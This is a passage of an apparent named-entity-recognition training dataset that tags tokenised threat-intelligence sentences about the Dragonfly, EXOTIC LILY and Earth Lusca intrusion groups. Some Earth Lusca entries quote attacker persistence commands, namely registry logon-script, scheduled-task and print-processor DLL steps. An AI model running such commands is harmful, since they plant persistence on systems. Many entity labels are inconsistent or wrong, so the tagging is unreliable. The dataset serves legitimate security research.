"I-Tool", "O", "I-Tool", "O", "O", "B-Tool", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Dragonfly", "has", "used", "the", "command", "line", "for", "execution." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Dragonfly", "has", "placed", "trojanized", "installers", "for", "control", "system", "software", "on", "legitimate", "vendor", "app", "stores." ], "ner_tags": [ "B-Idus", "O", "B-OffAct", "B-HackOrg", "B-Tool", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Dragonfly", "has", "collected", "data", "from", "local", "victim", "systems." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Dragonfly", "has", "disabled", "host-based", "firewalls.", "The", "group", "has", "also", "globally", "opened", "port", "3389." ], "ner_tags": [ "B-Org", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Dragonfly", "has", "used", "batch", "scripts", "to", "enumerate", "users", "on", "a", "victim", "domain", "controller." ], "ner_tags": [ "B-Idus", "O", "O", "B-Tool", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Dragonfly", "has", "used", "batch", "scripts", "to", "enumerate", "administrators", "and", "users", "in", "the", "domain." ], "ner_tags": [ "B-Idus", "O", "O", "I-Tool", "I-Tool", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Dragonfly", "has", "registered", "domains", "for", "targeting", "intended", "victims." ], "ner_tags": [ "B-Org", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Dragonfly", "has", "compromised", "targets", "via", "strategic", "web", "compromise", "(SWC)", "utilizing", "a", "custom", "exploit", "kit." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "I-Way", "I-Way", "I-Way", "B-Way", "O", "O", "I-Tool", "I-Tool", "O" ] }, { "tokens": [ "Dragonfly", "has", "compromised", "websites", "to", "redirect", "traffic", "and", "to", "host", "exploit", "kits." ], "ner_tags": [ "B-Org", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Dragonfly", "has", "conducted", "SQL", "injection", "attacks,", "exploited", "vulnerabilities", "CVE-2019-19781", "and", "CVE-2020-0688", "for", "Citrix", "and", "MS", "Exchange,", "and", "CVE-2018-13379", "for", "Fortinet", "VPNs." ], "ner_tags": [ "B-Idus", "O", "O", "B-Org", "I-OffAct", "O", "O", "O", "B-Features", "O", "B-Features", "O", "B-Org", "O", "O", "O", "O", "B-Features", "O", "O", "O" ] }, { "tokens": [ "Dragonfly", "has", "exploited", "CVE-2011-0611", "in", "Adobe", "Flash", "Player", "to", "gain", "execution", "on", "a", "targeted", "system." ], "ner_tags": [ "B-Idus", "O", "O", "B-Features", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Dragonfly", "has", "exploited", "a", "Windows", "Netlogon", "vulnerability", "(CVE-2020-1472)", "to", "obtain", "access", "to", "Windows", "Active", "Directory", "servers." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "B-Features", "B-Exp", "B-Features", "O", "B-Purp", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Dragonfly", "has", "used", "VPNs", "and", "Outlook", "Web", "Access", "(OWA)", "to", "maintain", "access", "to", "victim", "networks." ], "ner_tags": [ "B-Idus", "O", "O", "B-Way", "O", "B-Way", "O", "O", "O", "O", "I-Purp", "I-Purp", "O", "O", "O" ] }, { "tokens": [ "Dragonfly", "has", "deleted", "many", "of", "its", "files", "used", "during", "operations", "as", "part", "of", "cleanup,", "including", "removing", "applications", "and", "deleting", "screenshots." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "I-Way", "I-Way", "O", "B-Way", "O" ] }, { "tokens": [ "Dragonfly", "has", "used", "SMB", "for", "C2." ], "ner_tags": [ "B-Idus", "O", "O", "B-Way", "O", "O" ] }, { "tokens": [ "Dragonfly", "has", "used", "a", "batch", "script", "to", "gather", "folder", "and", "file", "names", "from", "victim", "hosts." ], "ner_tags": [ "B-Idus", "O", "O", "O", "B-Tool", "B-Way", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Dragonfly", "has", "gathered", "hashed", "user", "credentials", "over", "SMB", "using", "spearphishing", "attachments", "with", "external", "resource", "links", "and", "by", "modifying", ".LNK", "file", "icon", "resources", "to", "collect", "credentials", "from", "virtualized", "systems." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "B-Way", "O", "B-Way", "O", "O", "O", "O", "O", "O", "O", "B-SamFile", "B-SamFile", "O", "O", "O", "O", "I-Purp", "I-Purp", "O", "O", "O" ] }, { "tokens": [ "Dragonfly", "has", "modified", "the", "Registry", "to", "hide", "created", "user", "accounts." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Dragonfly", "has", "copied", "and", "installed", "tools", "for", "operations", "once", "in", "the", "victim", "environment." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Dragonfly", "has", "dropped", "and", "executed", "SecretsDump", "to", "dump", "password", "hashes." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "B-Way", "O", "O", "O", "O" ] }, { "tokens": [ "Dragonfly", "has", "created", "accounts", "on", "victims,", "including", "administrator", "accounts,", "some", "of", "which", "appeared", "to", "be", "tailored", "to", "each", "individual", "staging", "target." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Dragonfly", "has", "created", "a", "directory", "named", "\"out\"", "in", "the", "user's", "%AppData%", "folder", "and", "copied", "files", "to", "it." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Dragonfly", "has", "used", "various", "forms", "of", "spearphishing", "in", "attempts", "to", "get", "users", "to", "open", "malicious", "attachments." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "B-Way", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Dragonfly", "has", "created", "accounts", "disguised", "as", "legitimate", "backup", "and", "service", "accounts", "as", "well", "as", "an", "email", "administration", "account." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "I-Way", "I-Way", "O" ] }, { "tokens": [ "Dragonfly", "has", "modified", "the", "Registry", "to", "perform", "multiple", "techniques", "through", "the", "use", "of", "Reg." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-Tool" ] }, { "tokens": [ "Dragonfly", "has", "dropped", "and", "executed", "SecretsDump", "to", "dump", "password", "hashes.", "They", "also", "obtained", "ntds.dit", "from", "domain", "controllers." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "B-Way", "O", "O", "O", "O", "O", "O", "O", "B-Way", "O", "O", "O" ] }, { "tokens": [ "Dragonfly", "has", "identified", "and", "browsed", "file", "servers", "in", "the", "victim", "network,", "sometimes", ",", "viewing", "files", "pertaining", "to", "ICS", "or", "Supervisory", "Control", "and", "Data", "Acquisition", "(SCADA)", "systems." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Dragonfly", "has", "dropped", "and", "executed", "tools", "used", "for", "password", "cracking,", "including", "Hydra", "and", "CrackMapExec." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "I-Way", "O", "O", "B-Way", "O", "B-Way" ] }, { "tokens": [ "Dragonfly", "has", "used", "PowerShell", "scripts", "for", "execution." ], "ner_tags": [ "B-Idus", "O", "O", "B-Way", "B-Tool", "O", "O" ] }, { "tokens": [ "Dragonfly", "has", "used", "various", "types", "of", "scripting", "to", "perform", "operations,", "including", "Python", "scripts.", "The", "group", "was", "observed", "installing", "Python", "2.7", "on", "a", "victim." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-HackOrg", "O", "O", "O", "O", "B-Tool", "O", "O", "O" ] }, { "tokens": [ "Dragonfly", "has", "queried", "the", "Registry", "to", "identify", "victim", "information." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Dragonfly", "has", "added", "the", "registry", "value", "ntdll", "to", "the", "Registry", "Run", "key", "to", "establish", "persistence." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Dragonfly", "has", "moved", "laterally", "via", "RDP." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "B-Way" ] }, { "tokens": [ "Dragonfly", "has", "accessed", "email", "accounts", "using", "Outlook", "Web", "Access." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Dragonfly", "has", "likely", "obtained", "a", "list", "of", "hosts", "in", "the", "victim", "environment." ], "ner_tags": [ "B-Org", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Dragonfly", "has", "used", "scheduled", "tasks", "to", "automatically", "log", "out", "of", "created", "accounts", "every", "8", "hours", "as", "well", "as", "to", "execute", "malicious", "files." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "I-Purp", "I-Purp", "I-Purp", "I-Purp", "I-Purp", "O", "O", "O", "O", "O", "O", "O", "O", "B-SamFile", "O" ] }, { "tokens": [ "Dragonfly", "has", "performed", "screen", "captures", "of", "victims,", "including", "by", "using", "a", "tool,", "scr.exe", "(which", "matched", "the", "hash", "of", "ScreenUtil)." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-Way", "O", "O", "O", "O", "O", "B-Org" ] }, { "tokens": [ "Dragonfly", "has", "dropped", "and", "executed", "SecretsDump", "to", "dump", "password", "hashes." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "B-Way", "O", "O", "O", "O" ] }, { "tokens": [ "Dragonfly", "has", "compromised", "legitimate", "websites", "to", "host", "C2", "and", "malware", "modules." ], "ner_tags": [ "B-Org", "O", "O", "B-Way", "B-Tool", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Dragonfly", "has", "sent", "emails", "with", "malicious", "attachments", "to", "gain", "initial", "access." ], "ner_tags": [ "B-Idus", "O", "O", "B-Way", "O", "O", "O", "O", "O", "B-Purp", "O" ] }, { "tokens": [ "Dragonfly", "has", "used", "spearphishing", "with", "Microsoft", "Office", "attachments", "to", "enable", "harvesting", "of", "user", "credentials." ], "ner_tags": [ "B-Idus", "O", "O", "B-Way", "O", "O", "O", "O", "O", "O", "B-Way", "B-Purp", "O", "O" ] }, { "tokens": [ "Dragonfly", "has", "used", "spearphishing", "with", "PDF", "attachments", "containing", "malicious", "links", "that", "redirected", "to", "credential", "harvesting", "websites." ], "ner_tags": [ "B-Idus", "O", "O", "B-Way", "O", "B-Tool", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Dragonfly", "has", "used", "batch", "scripts", "to", "enumerate", "network", "information,", "including", "information", "about", "trusts,", "zones,", "and", "the", "domain." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-Idus", "O", "O", "O", "O" ] }, { "tokens": [ "Dragonfly", "used", "the", "command", "<code>query", "user</code>", "on", "victim", "hosts." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Dragonfly", "has", "injected", "SMB", "URLs", "into", "malicious", "Word", "spearphishing", "attachments", "to", "initiate", "Forced", "Authentication." ], "ner_tags": [ "B-Idus", "O", "O", "B-Tool", "O", "O", "O", "B-Tool", "B-Way", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Dragonfly", "has", "obtained", "and", "used", "tools", "such", "as", "Mimikatz,", "CrackMapExec,", "and", "PsExec." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "B-Way", "B-Way", "O", "B-Way" ] }, { "tokens": [ "Dragonfly", "has", "compromised", "user", "credentials", "and", "used", "valid", "accounts", "for", "operations." ], "ner_tags": [ "B-Idus", "O", "B-Way", "O", "B-Way", "O", "I-Way", "I-Way", "I-Way", "O", "O" ] }, { "tokens": [ "Dragonfly", "has", "acquired", "VPS", "infrastructure", "for", "use", "in", "malicious", "campaigns." ], "ner_tags": [ "B-Org", "O", "O", "O", "O", "O", "O", "O", "B-Org", "B-OffAct" ] }, { "tokens": [ "Dragonfly", "has", "scanned", "targeted", "systems", "for", "vulnerable", "Citrix", "and", "Microsoft", "Exchange", "services." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "B-Way", "O", "O", "O", "O" ] }, { "tokens": [ "Dragonfly", "has", "commonly", "created", "Web", "shells", "on", "victims'", "publicly", "accessible", "email", "and", "web", "servers,", "which", "they", "used", "to", "maintain", "access", "to", "a", "victim", "network", "and", "download", "additional", "malicious", "files." ], "ner_tags": [ "B-Idus", "O", "O", "O", "I-Tool", "I-Tool", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "I-Purp", "I-Purp", "O", "O", "O", "O", "O", "I-Purp", "I-Purp", "B-Purp", "O" ] }, { "tokens": [ "Dragonfly", "has", "used", "various", "types", "of", "scripting", "to", "perform", "operations,", "including", "batch", "scripts." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "I-Tool", "O" ] }, { "tokens": [ "EXOTIC", "LILY", "has", "registered", "domains", "to", "spoof", "targeted", "organizations", "by", "changing", "the", "top-level", "domain", "(TLD)", "to", "“.us”,", "“.co”", "or", "“.biz”." ], "ner_tags": [ "B-Idus", "B-HackOrg", "O", "O", "O", "O", "O", "O", "O", "O", "B-Way", "O", "O", "O", "O", "O", "B-SamFile", "B-SamFile", "O", "B-SamFile" ] }, { "tokens": [ "EXOTIC", "LILY", "has", "created", "e-mail", "accounts", "to", "spoof", "targeted", "organizations." ], "ner_tags": [ "B-Idus", "B-HackOrg", "O", "O", "B-Way", "B-Tool", "O", "O", "O", "O" ] }, { "tokens": [ "EXOTIC", "LILY", "has", "gathered", "targeted", "individuals'", "e-mail", "addresses", "through", "open", "source", "research", "and", "website", "contact", "forms." ], "ner_tags": [ "B-Idus", "B-HackOrg", "O", "O", "O", "O", "B-Way", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "EXOTIC", "LILY", "has", "used", "malicious", "documents", "containing", "exploits", "for", "CVE-2021-40444", "affecting", "Microsoft", "MSHTML." ], "ner_tags": [ "B-Idus", "B-HackOrg", "O", "O", "O", "O", "O", "O", "O", "B-Features", "O", "O", "O" ] }, { "tokens": [ "EXOTIC", "LILY", "has", "gained", "execution", "through", "victims", "clicking", "on", "malicious", "LNK", "files", "contained", "within", "ISO", "files,", "which", "can", "execute", "hidden", "DLLs", "within", "the", "ISO." ], "ner_tags": [ "B-Idus", "B-HackOrg", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "EXOTIC", "LILY", "has", "used", "malicious", "links", "to", "lure", "users", "into", "executing", "malicious", "payloads." ], "ner_tags": [ "B-Idus", "B-HackOrg", "O", "O", "B-Way", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "EXOTIC", "LILY", "has", "searched", "for", "information", "on", "targeted", "individuals", "on", "business", "databases", "including", "RocketReach", "and", "CrunchBase." ], "ner_tags": [ "B-Idus", "B-HackOrg", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-Way", "O", "B-Way" ] }, { "tokens": [ "EXOTIC", "LILY", "has", "used", "contact", "forms", "on", "victim", "websites", "to", "generate", "phishing", "e-mails." ], "ner_tags": [ "B-Idus", "B-HackOrg", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-Way", "O" ] }, { "tokens": [ "EXOTIC", "LILY", "has", "copied", "data", "from", "social", "media", "sites", "to", "impersonate", "targeted", "individuals." ], "ner_tags": [ "B-Idus", "B-HackOrg", "O", "O", "O", "O", "I-Idus", "I-Idus", "O", "O", "O", "O", "O" ] }, { "tokens": [ "EXOTIC", "LILY", "has", "established", "social", "media", "profiles", "to", "mimic", "employees", "of", "targeted", "companies." ], "ner_tags": [ "B-Idus", "B-HackOrg", "O", "O", "I-Idus", "I-Idus", "O", "O", "O", "B-Org", "O", "O", "O" ] }, { "tokens": [ "EXOTIC", "LILY", "conducted", "an", "e-mail", "thread-hijacking", "campaign", "with", "malicious", "ISO", "attachments." ], "ner_tags": [ "B-Idus", "B-HackOrg", "O", "O", "B-Way", "B-Org", "B-OffAct", "O", "O", "B-Tool", "B-Tool" ] }, { "tokens": [ "EXOTIC", "LILY", "has", "relied", "on", "victims", "to", "open", "malicious", "links", "in", "e-mails", "for", "execution." ], "ner_tags": [ "B-Idus", "B-HackOrg", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-Way", "O", "O" ] }, { "tokens": [ "EXOTIC", "LILY", "has", "used", "the", "e-mail", "notification", "features", "of", "legitimate", "file", "sharing", "services", "for", "spearphishing." ], "ner_tags": [ "B-Idus", "B-HackOrg", "O", "O", "O", "B-Way", "O", "O", "O", "O", "O", "O", "O", "O", "B-Way" ] }, { "tokens": [ "EXOTIC", "LILY", "has", "uploaded", "malicious", "payloads", "to", "file-sharing", "services", "including", "TransferNow,", "TransferXL,", "WeTransfer,", "and", "OneDrive." ], "ner_tags": [ "B-Idus", "B-HackOrg", "O", "O", "O", "O", "O", "O", "O", "O", "B-Way", "B-Way", "B-Way", "O", "B-Way" ] }, { "tokens": [ "EXOTIC", "LILY", "has", "used", "file-sharing", "services", "including", "WeTransfer,", "TransferNow,", "and", "OneDrive", "to", "deliver", "payloads." ], "ner_tags": [ "B-Idus", "B-HackOrg", "O", "O", "O", "O", "O", "B-Way", "B-Way", "O", "B-Way", "O", "O", "O" ] }, { "tokens": [ "Earth", "Lusca", "has", "used", "WinRAR", "to", "compress", "stolen", "files", "into", "an", "archive", "prior", "to", "exfiltration." ], "ner_tags": [ "I-HackOrg", "I-HackOrg", "O", "O", "B-Way", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Earth", "Lusca", "has", "used", "the", "Fodhelper", "UAC", "bypass", "technique", "to", "gain", "elevated", "privileges." ], "ner_tags": [ "I-HackOrg", "I-HackOrg", "O", "O", "O", "B-Way", "B-Tool", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Earth", "Lusca", "has", "used", "a", "<code>DCSync</code>", "command", "with", "Mimikatz", "to", "retrieve", "credentials", "from", "an", "exploited", "controller." ], "ner_tags": [ "I-HackOrg", "I-HackOrg", "O", "O", "O", "O", "O", "O", "B-Way", "O", "I-Purp", "I-Purp", "O", "O", "O", "O" ] }, { "tokens": [ "Earth", "Lusca", "has", "placed", "a", "malicious", "payload", "in", "`%WINDIR%\\SYSTEM32\\oci.dll`", "so", "it", "would", "be", "sideloaded", "by", "the", "MSDTC", "service." ], "ner_tags": [ "I-HackOrg", "I-HackOrg", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Earth", "Lusca", "has", "used", "certutil", "to", "decode", "a", "string", "into", "a", "cabinet", "file." ], "ner_tags": [ "I-HackOrg", "I-HackOrg", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Earth", "Lusca", "has", "used", "Nltest", "to", "obtain", "information", "about", "domain", "controllers." ], "ner_tags": [ "I-HackOrg", "I-HackOrg", "O", "O", "B-Way", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Earth", "Lusca", "has", "registered", "domains,", "intended", "to", "look", "like", "legitimate", "target", "domains,", "that", "have", "been", "used", "in", "watering", "hole", "attacks." ], "ner_tags": [ "I-Tool", "B-SecTeam", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-Org", "I-OffAct", "O" ] }, { "tokens": [ "Earth", "Lusca", "has", "performed", "watering", "hole", "attacks." ], "ner_tags": [ "I-HackOrg", "I-HackOrg", "O", "O", "B-Org", "I-OffAct", "O" ] }, { "tokens": [ "Earth", "Lusca", "has", "used", "the", "megacmd", "tool", "to", "upload", "stolen", "files", "from", "a", "victim", "network", "to", "MEGA." ], "ner_tags": [ "I-HackOrg", "I-HackOrg", "O", "O", "O", "O", "O", "O", "O", "O", "B-Purp", "O", "O", "O", "O", "O", "B-Area" ] }, { "tokens": [ "Earth", "Lusca", "has", "compromised", "victims", "by", "directly", "exploiting", "vulnerabilities", "of", "public-facing", "servers,", "including", "those", "associated", "with", "Microsoft", "Exchange", "and", "Oracle", "GlassFish." ], "ner_tags": [ "I-HackOrg", "I-HackOrg", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-Purp" ] }, { "tokens": [ "Earth", "Lusca", "has", "used", "Mimikatz", "to", "exploit", "a", "domain", "controller", "via", "the", "ZeroLogon", "exploit", "(CVE-2020-1472)." ], "ner_tags": [ "I-HackOrg", "I-HackOrg", "O", "O", "B-Way", "O", "O", "O", "O", "O", "O", "O", "B-Features", "B-Exp", "B-Features" ] }, { "tokens": [ "Earth", "Lusca", "has", "manipulated", "legitimate", "websites", "to", "inject", "malicious", "JavaScript", "code", "as", "part", "of", "their", "watering", "hole", "operations." ], "ner_tags": [ "I-HackOrg", "I-HackOrg", "O", "O", "O", "O", "O", "O", "O", "B-Way", "O", "O", "O", "O", "O", "B-Org", "B-OffAct", "O" ] }, { "tokens": [ "Earth", "Lusca", "has", "used", "ProcDump", "to", "obtain", "the", "hashes", "of", "credentials", "by", "dumping", "the", "memory", "of", "the", "LSASS", "process." ], "ner_tags": [ "I-HackOrg", "I-HackOrg", "O", "O", "B-Way", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Earth", "Lusca", "required", "users", "to", "click", "on", "a", "malicious", "file", "for", "the", "loader", "to", "activate." ], "ner_tags": [ "I-SamFile", "B-SecTeam", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Earth", "Lusca", "has", "sent", "spearphishing", "emails", "that", "required", "the", "user", "to", "click", "on", "a", "malicious", "link", "and", "subsequently", "open", "a", "decoy", "document", "with", "a", "malicious", "loader." ], "ner_tags": [ "I-HackOrg", "I-HackOrg", "O", "O", "B-Way", "I-Way", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Earth", "Lusca", "has", "acquired", "and", "used", "a", "variety", "of", "malware,", "including", "Cobalt", "Strike." ], "ner_tags": [ "I-HackOrg", "I-HackOrg", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-Way", "B-Tool" ] }, { "tokens": [ "Earth", "Lusca", "used", "the", "command", "`move", "[file", "path]", "c:\\windows\\system32\\spool\\prtprocs\\x64\\spool.dll`", "to", "move", "and", "register", "a", "malicious", "DLL", "name", "as", "a", "Windows", "print", "processor,", "which", "eventually", "was", "loaded", "by", "the", "Print", "Spooler", "service." ], "ner_tags": [ "I-HackOrg", "I-HackOrg", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Earth", "Lusca", "modified", "the", "registry", "using", "the", "command", "<code>reg", "add", "“HKEY_CURRENT_USER\\Environment”", "/v", "UserInitMprLogonScript", "/t", "REG_SZ", "/d", "“[file", "path]”</code>", "for", "persistence." ], "ner_tags": [ "I-HackOrg", "I-HackOrg", "O", "O", "O", "O", "O", "O", "O", "O", "B-SamFile", "O", "B-SamFile", "O", "B-SamFile", "B-SamFile", "B-SamFile", "O", "O", "O" ] }, { "tokens": [ "Earth", "Lusca", "has", "used", "`mshta.exe`", "to", "load", "an", "HTA", "script", "within", "a", "malicious", ".LNK", "file." ], "ner_tags": [ "I-HackOrg", "I-HackOrg", "O", "O", "B-SamFile", "O", "O", "O", "O", "O", "O", "O", "B-SamFile", "B-SamFile", "O" ] }, { "tokens": [ "Earth", "Lusca", "used", "Base64", "to", "encode", "strings." ], "ner_tags": [ "I-HackOrg", "I-HackOrg", "O", "B-Way", "O", "O", "O" ] }, { "tokens": [ "Earth", "Lusca", "has", "used", "PowerShell", "to", "execute", "commands." ], "ner_tags": [ "I-HackOrg", "I-HackOrg", "O", "O", "B-Way", "O", "O", "O" ] }, { "tokens": [ "Earth", "Lusca", "has", "added", "the", "Registry", "key", "`HKLM\\SYSTEM\\ControlSet001\\Control\\Print\\Environments\\Windows", "x64\\Print", "Processors\\UDPrint”", "/v", "Driver", "/d", "“spool.dll", "/f`", "to", "load", "malware", "as", "a", "Print", "Processor." ], "ner_tags": [ "I-HackOrg", "I-HackOrg", "O", "O", "O", "O", "O", "B-Way", "O", "B-SamFile", "O", "O", "O", "B-SamFile", "B-SamFile", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Earth", "Lusca", "has", "used", "Tasklist", "to", "obtain", "information", "from", "a", "compromised", "host." ], "ner_tags": [ "I-HackOrg", "I-HackOrg", "O", "O", "B-Way", "O", "O", "B-Purp", "O", "O", "O", "O" ] }, { "tokens": [ "Earth", "Lusca", "adopted", "Cloudflare", "as", "a", "proxy", "for", "compromised", "servers." ], "ner_tags": [ "I-HackOrg", "I-HackOrg", "O", "B-Way", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Earth", "Lusca", "used", "Python", "scripts", "for", "port", "scanning", "or", "building", "reverse", "shells." ], "ner_tags": [ "I-HackOrg", "I-HackOrg", "O", "O", "O", "O", "O", "O", "O", "O", "B-Features", "O" ] }, { "tokens": [ "Earth", "Lusca", "used", "the", "command", "<code>powershell", "“Get-EventLog", "-LogName", "security", "-Newest", "500", "|", "where", "{$_.EventID", "-eq", "4624}", "|", "format-list", "-", "property", "*", "|", "findstr", "“Address””</code>", "to", "find", "the", "network", "information", "of", "successfully", "logged-in", "accounts", "to", "discovery", "addresses", "of", "other", "machines.", "Earth", "Lusca", "has", "also", "used", "multiple", "scanning", "tools", "to", "discover", "other", "machines", "within", "the", "same", "compromised", "network." ], "ner_tags": [ "I-HackOrg", "I-HackOrg", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "I-HackOrg", "I-HackOrg", "O", "O", "O", "O", "O", "B-Tool", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Earth", "Lusca", "has", "dropped", "an", "SSH-authorized", "key", "in", "the", "`/root/.ssh`", "folder", "in", "order", "to", "access", "a", "compromised", "server", "with", "SSH." ], "ner_tags": [ "I-HackOrg", "I-HackOrg", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Earth", "Lusca", "used", "the", "command", "<code>schtasks", "/Create", "/SC", "ONLOgon", "/TN", "WindowsUpdateCheck", "/TR", "“[file", "path]”", "/ru", "system</code>", "for", "persistence." ], "ner_tags": [ "I-HackOrg", "I-HackOrg", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Earth", "Lusca", "has", "acquired", "multiple", "servers", "for", "some", "of", "their", "operations,", "using", "each", "server", "for", "a", "different", "role." ], "ner_tags": [ "I-HackOrg", "I-HackOrg", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Earth", "Lusca", "has", "used", "compromised", "web", "servers", "as", "part", "of", "their", "operational", "infrastructure." ], "ner_tags": [ "I-HackOrg", "B-Tool", "O", "O", "I-Tool", "I-Tool", "I-Tool", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Earth", "Lusca", "has", "sent", "spearphishing", "emails", "to", "potential", "targets", "that", "contained", "a", "malicious", "link." ], "ner_tags": [ "I-HackOrg", "I-HackOrg", "O", "O", "B-Way", "I-Way", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Earth", "Lusca", "has", "used", "steganography", "to", "hide", "shellcode", "in", "a", "BMP", "image", "file." ], "ner_tags": [ "I-HackOrg", "I-HackOrg", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Earth", "Lusca", "used", "the", "command", "<code>ipconfig</code>", "to", "obtain", "information", "about", "network", "configurations." ], "ner_tags": [ "I-HackOrg", "I-HackOrg", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Earth", "Lusca", "employed", "a", "PowerShell", "script", "called", "RDPConnectionParser", "to", "read", "and", "filter", "the", "Windows", "event", "log", "“Microsoft-Windows-TerminalServices-RDPClient/Operational”", "(Event", "ID", "1024)", "to", "obtain", "network", "information", "from", "RDP", 